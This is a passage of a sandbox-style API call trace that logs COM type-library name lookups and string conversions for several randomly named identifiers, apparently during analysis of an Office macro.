pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.969] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.969] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.969] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="BkBXDZA", lHashVal=0x101622, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.969] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b7a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BkBXDZA") returned 8 [0068.969] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="BkBXDZA", lHashVal=0x101622, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.969] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.969] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61b7a | out: _Dst=0x67c2d40) returned 0x0 [0068.969] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BkBXDZA") returned 0x1019a6 [0068.969] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_BkBXDZA" | out: _Dst="_B_var_BkBXDZA") returned 0x0 [0068.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_BkBXDZA") returned 15 [0068.969] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.969] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_BkBXDZA", lHashVal=0x1019a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.969] IUnknown:Release (This=0x665ba50) returned 0xd [0068.969] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.969] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_BkBXDZA", lHashVal=0x1019a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.969] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.969] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.969] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_BkBXDZA", lHashVal=0x1019a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.969] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.969] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.970] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_BkBXDZA", lHashVal=0x1019a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.970] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.970] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.970] IUnknown:Release (This=0x665ba50) returned 0xd [0068.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b106de, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_BkBXDZA") returned 15 [0068.970] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_BkBXDZA", lHashVal=0x1019a6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x44005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x44005800000000, pDummy=0x0) returned 0x0 [0068.970] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61b7a | out: _Dst=0x144ec0) returned 0x0 [0068.970] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sAA1AB", lHashVal=0x10996f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b52, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAA1AB") returned 7 [0068.970] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sAA1AB", lHashVal=0x10996f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b52, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAA1AB") returned 7 [0068.970] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sAA1AB", lHashVal=0x10996f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sAA1AB") returned 0x10996f [0068.970] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="sAA1AB" | out: _Dst="sAA1AB") returned 0x0 [0068.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="sAA1AB") returned 7 [0068.971] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.971] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sAA1AB", lHashVal=0x10996f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.971] IUnknown:Release (This=0x665ba50) returned 0xd [0068.971] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.971] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sAA1AB", lHashVal=0x10996f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.971] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.971] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.971] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sAA1AB", lHashVal=0x10996f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.971] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.971] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.971] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sAA1AB", lHashVal=0x10996f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.971] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b52, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sAA1AB") returned 7 [0068.971] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sAA1AB", lHashVal=0x10996f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.971] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.971] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61b52 | out: _Dst=0x67c2d40) returned 0x0 [0068.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sAA1AB") returned 0x1013d9 [0068.971] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_sAA1AB" | out: _Dst="_B_var_sAA1AB") returned 0x0 [0068.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_sAA1AB") returned 14 [0068.971] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.971] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sAA1AB", lHashVal=0x1013d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.971] IUnknown:Release (This=0x665ba50) returned 0xd [0068.971] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.971] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sAA1AB", lHashVal=0x1013d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.971] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.971] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.971] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sAA1AB", lHashVal=0x1013d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.972] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.972] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.972] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sAA1AB", lHashVal=0x1013d9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.972] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.972] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.972] IUnknown:Release (This=0x665ba50) returned 0xd [0068.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1070e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_sAA1AB") returned 14 [0068.972] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sAA1AB", lHashVal=0x1013d9, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0068.972] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61b52 | out: _Dst=0x144ec0) returned 0x0 [0068.972] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HZAQQQ1U", lHashVal=0x105992, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HZAQQQ1U") returned 9 [0068.972] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HZAQQQ1U", lHashVal=0x105992, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HZAQQQ1U") returned 9 [0068.972] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HZAQQQ1U", lHashVal=0x105992, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HZAQQQ1U") returned 0x105992 [0068.972] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HZAQQQ1U" | out: _Dst="HZAQQQ1U") returned 0x0 [0068.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HZAQQQ1U") returned 9 [0068.972] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.972] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HZAQQQ1U", lHashVal=0x105992, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.972] IUnknown:Release (This=0x665ba50) returned 0xd [0068.972] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.972] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HZAQQQ1U", lHashVal=0x105992, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.972] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.973] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.973] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HZAQQQ1U", lHashVal=0x105992, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.973] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.973] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.973] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HZAQQQ1U", lHashVal=0x105992, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.973] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HZAQQQ1U") returned 9 [0068.973] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HZAQQQ1U", lHashVal=0x105992, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.973] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.973] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61bca | out: _Dst=0x67c2d40) returned 0x0 [0068.973] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HZAQQQ1U") returned 0x10311b [0068.973] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HZAQQQ1U" | out: _Dst="_B_var_HZAQQQ1U") returned 0x0 [0068.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HZAQQQ1U") returned 16 [0068.973] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.973] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HZAQQQ1U", lHashVal=0x10311b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.973] IUnknown:Release (This=0x665ba50) returned 0xd [0068.973] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.973] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HZAQQQ1U", lHashVal=0x10311b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.973] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.973] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.973] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HZAQQQ1U", lHashVal=0x10311b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.973] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.973] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.973] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HZAQQQ1U", lHashVal=0x10311b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.973] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.973] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.973] IUnknown:Release (This=0x665ba50) returned 0xd [0068.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1073e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_HZAQQQ1U") returned 16 [0068.974] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HZAQQQ1U", lHashVal=0x10311b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0) returned 0x0 [0068.974] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61bca | out: _Dst=0x144ec0) returned 0x0 [0068.974] IMalloc:Realloc (This=0x7fefec05380, pv=0x6843080, cb=0x2000) returned 0x6288170 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bf6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YA_GooX") returned 8 [0068.974] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YA_GooX", lHashVal=0x1077a4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bf6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YA_GooX") returned 8 [0068.974] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YA_GooX", lHashVal=0x1077a4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bf6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YA_GooX") returned 8 [0068.974] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YA_GooX", lHashVal=0x1077a4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.974] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YA_GooX") returned 0x1077a4 [0068.974] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YA_GooX" | out: _Dst="YA_GooX") returned 0x0 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YA_GooX") returned 8 [0068.974] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.974] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YA_GooX", lHashVal=0x1077a4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.974] IUnknown:Release (This=0x665ba50) returned 0xd [0068.974] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.974] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YA_GooX", lHashVal=0x1077a4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.974] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.974] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.974] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YA_GooX", lHashVal=0x1077a4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.975] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.975] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.975] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YA_GooX", lHashVal=0x1077a4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.975] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61bf6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YA_GooX") returned 8 [0068.975] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YA_GooX", lHashVal=0x1077a4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.975] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.975] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61bf6 | out: _Dst=0x67c2d40) returned 0x0 [0068.975] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YA_GooX") returned 0x106ba7 [0068.975] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YA_GooX" | out: _Dst="_B_var_YA_GooX") returned 0x0 [0068.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YA_GooX") returned 15 [0068.975] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.975] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YA_GooX", lHashVal=0x106ba7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.975] IUnknown:Release (This=0x665ba50) returned 0xd [0068.975] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.975] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YA_GooX", lHashVal=0x106ba7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.975] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.975] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.975] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YA_GooX", lHashVal=0x106ba7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.975] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.975] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.975] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YA_GooX", lHashVal=0x106ba7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.975] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.975] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.975] IUnknown:Release (This=0x665ba50) returned 0xd [0068.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1076e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_YA_GooX") returned 15 [0068.975] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YA_GooX", lHashVal=0x106ba7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x6f004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x6f004700000000, pDummy=0x0) returned 0x0 [0068.976] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61bf6 | out: _Dst=0x144ec0) returned 0x0 [0068.976] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Vo_ZUD", lHashVal=0x10e074, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c1e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Vo_ZUD") returned 7 [0068.976] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Vo_ZUD", lHashVal=0x10e074, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.976] MultiByteToWideChar (in: 